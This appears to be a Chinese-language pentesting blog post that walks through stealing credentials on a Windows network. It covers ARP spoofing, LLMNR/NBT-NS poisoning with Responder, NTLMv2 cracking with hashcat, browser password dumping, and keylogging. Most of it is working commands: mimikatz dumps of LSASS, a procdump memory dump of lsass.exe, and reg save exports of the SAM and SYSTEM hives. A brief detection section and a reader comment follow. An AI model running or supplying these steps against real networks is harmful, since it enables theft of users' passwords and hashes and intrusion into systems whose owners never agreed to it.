中间人攻击
arp欺骗
首先开启kali的ip转发
echo 1 > /proc/sys/net/ipv4/ip_forward
点击开始扫描
查看扫描结果:
将要欺骗的主机add to target1,网关add to target2
点击arp poisoning进行arp欺骗
查看arp列表已经发现网关已经变成kali的ip
LLMNR/NBT-NS中毒
- LLMNR和NetBIOS名称服务器广播:
当DNS名称服务器请求失败时,Windows系统就会通过链路本地多播名称解析(LLMNR)和Net-BIOS名称服务(NBT-NS)试图在本地进行名称解析。 - LLMNR和Netbios NS广播的缺点:
当DNS名称无法解析的时候,客户端就会将未经认证的UDP广播到网络中,询问它是否为本地系统的名称。 事实上,该过程是未被认证的,并会广播到整个网络,从而允许网络上的任何机器响应并声称是目标机器。
下载并运行Responder.py
下载地址:https://github.com/lgandx/Responder
python Responder.py -i 172.16.253.104 -I eth0
启动Responder.py后,我们可以在域控输入一个任意一个错误的smb服务名
然后如果需要输入网络凭证,也可以随便输一个错误的。
- 此时客户端会向DNS服务器取请求asd,然后DNS服务器返回没找到asd。然后客户端广播发送LLMNR/NBT-NS,攻击者会伪装成asd并且接受客户端发来的NTLMv2 hash,攻击完成。
在客户端广播不正确的服务器名称的几秒钟时间内,Responder.py就完成了对这个广播请求的应答,并将NTLMv2 hash保存在log文件夹下,名为SMB-NTLMv2-SSP-172.16.253.1.txt
接下来就是爆破hash,这里使用hashcat:
hashcat -m 5600 SMB-NTLMv2-SSP-172.16.253.1.txt word.txt --force
-m 5600表示爆破NTLMv2
SMB中继
- SMB(Server Message Block)是一个协议名称,用它可以共享计算机之间的文件、打印机、串口等,通过 SMB 也可以远程访问服务器端的文件、打印机等共享资源。
SMB中继的前提是关闭smb 签名
获取浏览器保存的账户密码
- chromepass
使用chromepass可以查看chrome里保存的密码
- WebBrowserPassView
可显示以下 Web 浏览器存储的密码:Internet Explorer(版本 4.0 - 11.0)、Mozilla Firefox(所有版本)、Google Chrome、Safari 和 Opera。该工具可用于恢复您丢失/忘记的任何网站的密码,包括流行的网站,如 Facebook、雅虎、谷歌和 GMail,只要密码由您的网络浏览器存储。
用户输入劫持
键盘记录可以使用cobalt strike中的Log Keystrokes
然后就可以获取到用户输入的内容
网络捕获分析
SniffPass
SniffPass可以捕捉啦本机和局域网中(前提是你要在出口网关上运行SniffPass并进行嗅探)POP3、IMAP4、SMTP、FTP、和HTTP等协议的密码。以找回遗忘的FTP密码为例:
首先运行SniffPass,选择网卡后点击左上角的开始捕获,当域内其他人使用ftp登陆时,账号和密码就会自动被记录下来
账号转储
mimikatz
如果操作系统更新了KB2871997补丁或者版本高于windows server 2012,就无法再默认情况下使用mimikatz获取用户明文密码
#提升权限
privilege::debug
#抓取密码
sekurlsa::logonpasswords
Procdump+Mimikatz
对于有些机器可能不允许运行mimikatz,所以我们可以先用微软的官方工具Procdump导出lsass.exe
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
然后会生成一个lsass.dmp,将lsass.dmp下载到本地,然后用mimikatz进行读取
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords full" exit
通过SAM和System文件抓取密码和Hash
首先利用注册表命令将目标机的sam或者system文件导出
reg save hklm\sam sam.hive
reg save hklm\system system.hive
然后将目标机上的sam.hive
和system.hive
下载到本地,利用Mimikatz读取sam和system文件获取NTLMHash:
lsadump::sam /sam:sam.hive /system:system.hive
然后使用https://www.objectif-securite.ch/en/ophcrack网站或在cmd5进行爆破,
检测方法:
- 监视与 lsass.exe 交互的意外进程(例如Mimikatz)。通过打开进程、定位 LSA 密钥并解密存储凭证详细信息(包括 Kerberos 票证)的内存部分来访问 LSA 子系统服务 (LSASS) 进程。
- 启用审核 Kerberos 服务票证操作以记录 Kerberos TGS 服务票证请求。特别调查不规则的活动模式(例如:帐户在很短的时间内发出大量请求,事件 ID 4769)
Kerberos 票据
黄金票据和白银票据详见:https://yuaneu.ro/archives/pen3.html
1 条评论
感觉又又有回到了暗组灌水的日子……